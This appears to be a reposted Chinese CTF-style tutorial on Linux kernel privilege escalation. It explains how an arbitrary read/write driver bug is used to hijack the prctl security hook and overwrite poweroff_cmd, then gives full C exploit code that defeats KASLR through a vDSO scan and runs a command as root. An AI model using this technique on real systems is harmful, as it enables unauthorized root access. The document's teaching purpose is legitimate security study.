linux 内核提权总结(demo+exp分析) -- 任意读写(三)

2024-09-08 10:38
文章标签 分析 linux 总结 读写 内核 任意 demo 提权 exp

本文主要是介绍linux 内核提权总结(demo+exp分析) -- 任意读写(三),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

hijack_prctl篇

本文转自网络文章,内容均为非盈利,版权归原作者所有。
转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。
原文作者:jmpcall
专栏地址:https://zhuanlan.kanxue.com/user-815036.htm

 

  • prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互

    1. 用户态执行prctl函数后触发prctl系统调用
    2. 内核接收参数后执行security_task_prctl
    3. security_task_prctl执行hook.task_prctl

  • poweroff_work_func函数: 内核函数,执行 run_cmd(poweroff_cmd),即root权限执行poweroff_cmd

  • 攻击流程:

    1. 劫持hook.task_prctl为目标函数地址(poweroff_work_func)
    2. 修改poweroff_cmd为目标指令
    3. 用户执行prctl函数,触发

一. 利用步骤

1. 定位内核加载基地址(开启kaslr)

  • 同hijack_vdso,泄漏vdso地址,因为内核kaslr开启后,只有较高字节的地址发生偏移,且vdso与基地址相距较近,所以可以使用vdso定位内核加载地址

2. 定位hook.prctl,poweroff_cmd地址

  • gdb调试内核并在security_task_prctl函数处下断点,用户态程序执行prctl函数,进入security_task_prctl函数,单步执行汇编指令,通过内存查看hook.task_prctl 地址

  • gdb 执行 p poweroff_cmd,获得poweroff_cmd真实地址

  • 获得hook.prctl,poweroff_cmd与内核基地址固定偏移

3. 修改poweroff_cmd 为任意指令

4. 用户态执行prctl函数,触发

二. 驱动代码

见cred篇:linux 内核提权总结(demo+exp分析) -- 任意读写(一)

三. exp

#define _GNU_SOURCE#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/auxv.h>
#include <sys/prctl.h>#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002
#define SET_MEM 0X100003size_t poweroff_cmd = 0;
size_t prctl_hook = 0;
size_t poweroff_work_func = 0;
size_t vmlinux_base = 0;struct vunl
{char *point;size_t size;
} VUNL;void leak_data(int fd, char *buf)
{char *res = NULL;VUNL.size = 0x1000;for (size_t addr = 0xffffffff80000000; addr < 0xffffffffffffffff; addr += 0x1000){VUNL.point = (char *)addr;ioctl(fd, CHANGE_POINT, &VUNL); //change the pointioctl(fd, RW_READ, buf);if (!strcmp("gettimeofday", buf + 0x2b5)){printf("[+] the addr of VDSO is: 0x%lx\n", addr);vmlinux_base = addr & 0xffffffffff000000;printf("[+] the addr of vmlinux base is: 0x%lx\n", vmlinux_base);break;}puts("[-] not found, try again!\n");}return;
}int main(int argc, char *argv[])
{int fd = 0;char *buf = malloc(0x1000);char cmd[] = "/bin/chmod 777 /flag\x00";fd = open("/dev/rw_any_dev", O_RDWR);leak_data(fd, buf);poweroff_cmd = vmlinux_base + 0xe3e1a0;prctl_hook = vmlinux_base + 0xe81078;poweroff_work_func = vmlinux_base + 0x075480;printf("[+] the addr of poweroff_cmd is: 0x%lx\n", poweroff_cmd);printf("[+] the addr of prctl hook is: 0x%lx\n", prctl_hook);printf("[+] the addr of orderly_poweroff is: 0x%lx\n", poweroff_work_func);VUNL.size = strlen(cmd)+1;// VUNL.size = strlen(argv[1])+1;VUNL.point = (char *)poweroff_cmd;ioctl(fd, CHANGE_POINT, &VUNL);ioctl(fd, RW_WRITE, cmd);// ioctl(fd, RW_WRITE, argv[1]);VUNL.size = 8;VUNL.point = (char *)prctl_hook;ioctl(fd, CHANGE_POINT, &VUNL);ioctl(fd, RW_WRITE, &poweroff_work_func);puts("[+] the cmd arg must have an ansolute_address");prctl(PR_GET_NAME, "test");return 0;
}

 

这篇关于linux 内核提权总结(demo+exp分析) -- 任意读写(三)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/1147881

相关文章

Linux下如何使用C++获取硬件信息

Linux下如何使用C++获取硬件信息

《Linux下如何使用C++获取硬件信息》这篇文章主要为大家详细介绍了如何使用C++实现获取CPU,主板,磁盘,BIOS信息等硬件信息,文中的示例代码讲解详细,感兴趣的小伙伴可以了解下... 目录方法获取CPU信息:读取"/proc/cpuinfo"文件获取磁盘信息:读取"/proc/diskstats"文
阅读更多...
Java字符串操作技巧之语法、示例与应用场景分析

Java字符串操作技巧之语法、示例与应用场景分析

《Java字符串操作技巧之语法、示例与应用场景分析》在Java算法题和日常开发中,字符串处理是必备的核心技能,本文全面梳理Java中字符串的常用操作语法,结合代码示例、应用场景和避坑指南,可快速掌握字... 目录引言1. 基础操作1.1 创建字符串1.2 获取长度1.3 访问字符2. 字符串处理2.1 子字
阅读更多...
Linux内核参数配置与验证详细指南

Linux内核参数配置与验证详细指南

《Linux内核参数配置与验证详细指南》在Linux系统运维和性能优化中,内核参数(sysctl)的配置至关重要,本文主要来聊聊如何配置与验证这些Linux内核参数,希望对大家有一定的帮助... 目录1. 引言2. 内核参数的作用3. 如何设置内核参数3.1 临时设置(重启失效)3.2 永久设置(重启仍生效
阅读更多...
kali linux 无法登录root的问题及解决方法

kali linux 无法登录root的问题及解决方法

《kalilinux无法登录root的问题及解决方法》:本文主要介绍kalilinux无法登录root的问题及解决方法,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,... 目录kali linux 无法登录root1、问题描述1.1、本地登录root1.2、ssh远程登录root2、
阅读更多...
Linux ls命令操作详解

Linux ls命令操作详解

《Linuxls命令操作详解》通过ls命令,我们可以查看指定目录下的文件和子目录,并结合不同的选项获取详细的文件信息,如权限、大小、修改时间等,:本文主要介绍Linuxls命令详解,需要的朋友可... 目录1. 命令简介2. 命令的基本语法和用法2.1 语法格式2.2 使用示例2.2.1 列出当前目录下的文
阅读更多...
Python 迭代器和生成器概念及场景分析

Python 迭代器和生成器概念及场景分析

《Python迭代器和生成器概念及场景分析》yield是Python中实现惰性计算和协程的核心工具,结合send()、throw()、close()等方法,能够构建高效、灵活的数据流和控制流模型,这... 目录迭代器的介绍自定义迭代器省略的迭代器生产器的介绍yield的普通用法yield的高级用法yidle
阅读更多...
C++ Sort函数使用场景分析

C++ Sort函数使用场景分析

《C++Sort函数使用场景分析》sort函数是algorithm库下的一个函数,sort函数是不稳定的,即大小相同的元素在排序后相对顺序可能发生改变,如果某些场景需要保持相同元素间的相对顺序,可使... 目录C++ Sort函数详解一、sort函数调用的两种方式二、sort函数使用场景三、sort函数排序
阅读更多...
Linux中的计划任务(crontab)使用方式

Linux中的计划任务(crontab)使用方式

《Linux中的计划任务(crontab)使用方式》:本文主要介绍Linux中的计划任务(crontab)使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、前言1、linux的起源与发展2、什么是计划任务(crontab)二、crontab基础1、cro
阅读更多...
kotlin中const 和val的区别及使用场景分析

kotlin中const 和val的区别及使用场景分析

《kotlin中const和val的区别及使用场景分析》在Kotlin中,const和val都是用来声明常量的,但它们的使用场景和功能有所不同,下面给大家介绍kotlin中const和val的区别,... 目录kotlin中const 和val的区别1. val:2. const:二 代码示例1 Java
阅读更多...
Linux换行符的使用方法详解

Linux换行符的使用方法详解

《Linux换行符的使用方法详解》本文介绍了Linux中常用的换行符LF及其在文件中的表示,展示了如何使用sed命令替换换行符,并列举了与换行符处理相关的Linux命令,通过代码讲解的非常详细,需要的... 目录简介检测文件中的换行符使用 cat -A 查看换行符使用 od -c 检查字符换行符格式转换将
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2